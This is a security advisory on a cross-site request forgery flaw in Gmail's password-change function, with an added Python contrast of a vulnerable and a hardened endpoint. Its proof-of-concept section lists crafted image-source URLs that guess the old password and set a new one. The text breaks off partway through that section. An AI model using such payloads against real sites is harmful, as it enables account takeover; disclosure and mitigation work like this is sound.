Summary

Gmail is Google's "free webmail service. It comes with built-in Google search technology and over 2,600 megabytes of storage (and growing every day). You can keep all your important messages, files and pictures forever, use search to quickly and easily find anything you're looking for, and make sense of it all with a new way of viewing messages as part of conversations".

Cross-Site Request Forgery, also known as one click attack or session riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of malicious exploit of websites. Although this type of attack has similarities to cross-site scripting (XSS), cross-site scripting requires the attacker to inject unauthorized code into a website, while cross-site request forgery merely transmits unauthorized commands from a user the website trusts.

Gmail is vulnerable to CSRF attacks in the "Change Password" functionality. The only token used to authenticate the user is a session cookie, and the browser sends this cookie automatically with every request.

An attacker can create a page that includes requests to the "Change Password" functionality of Gmail and thereby change the passwords of authenticated users who visit the attacker's page.

The attack is made easier because the "Change Password" request can be issued with the HTTP GET method instead of the POST method normally used by the "Change Password" form.
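To make the two design points above concrete, here is an added example (not code from the advisory or from Google) that models the endpoint once in the weak form the advisory describes, authenticated only by the session cookie and accepting any method, and once hardened with a POST-only rule, a per-session anti-CSRF token and a cap on wrong-old-password attempts. Session store, user names and passwords are constructed placeholders.

```python
import hmac
import secrets

# Constructed in-memory state for one logged-in user (hypothetical names).
SESSIONS = {"sess-1": {"user": "alice", "csrf": secrets.token_hex(16), "failed": 0}}
PASSWORDS = {"alice": "correct-horse"}
MAX_FAILED = 3


def update_passwd_vulnerable(method, cookies, params):
    """Weak design: GET or POST accepted, the session cookie is the only check."""
    sess = SESSIONS.get(cookies.get("SID"))
    if sess is None:
        return 401, "not logged in"
    user = sess["user"]
    if params.get("OldPasswd") != PASSWORDS[user]:
        return 200, "wrong old password"   # a cross-site page can retry freely
    if params.get("Passwd") != params.get("PasswdAgain"):
        return 200, "passwords differ"
    PASSWORDS[user] = params["Passwd"]
    return 200, "password changed"


def update_passwd_hardened(method, cookies, params):
    """Same endpoint with the mitigations a reviewer would ask for."""
    if method != "POST":
        return 405, "method not allowed"   # no image- or frame-triggered GETs
    sess = SESSIONS.get(cookies.get("SID"))
    if sess is None:
        return 401, "not logged in"
    # The token travels in the form body, never in a cookie, so a cross-site
    # page that cannot read the logged-in page cannot supply it.
    token = params.get("csrf_token", "")
    if not hmac.compare_digest(token, sess["csrf"]):
        return 403, "missing or invalid anti-CSRF token"
    if sess["failed"] >= MAX_FAILED:
        return 429, "too many failed attempts; re-authenticate"
    user = sess["user"]
    if not hmac.compare_digest(params.get("OldPasswd", ""), PASSWORDS[user]):
        sess["failed"] += 1               # bounds old-password guessing
        return 200, "wrong old password"
    if params.get("Passwd") != params.get("PasswdAgain"):
        return 200, "passwords differ"
    PASSWORDS[user] = params["Passwd"]
    sess["failed"] = 0
    return 200, "password changed"
```

In a real deployment the stored password would be a salted hash and the token would also be tied to the form that issued it; the example keeps plaintext only to stay short.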

DETAILS

Proof of concept:
1. An attacker creates a web page "csrf-attack.html" that issues several HTTP GET requests to the "Change Password" functionality.

For example, a password-guessing attempt with three candidate old passwords (see the "OldPasswd" parameter):
...
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
...

or with hidden frames:
...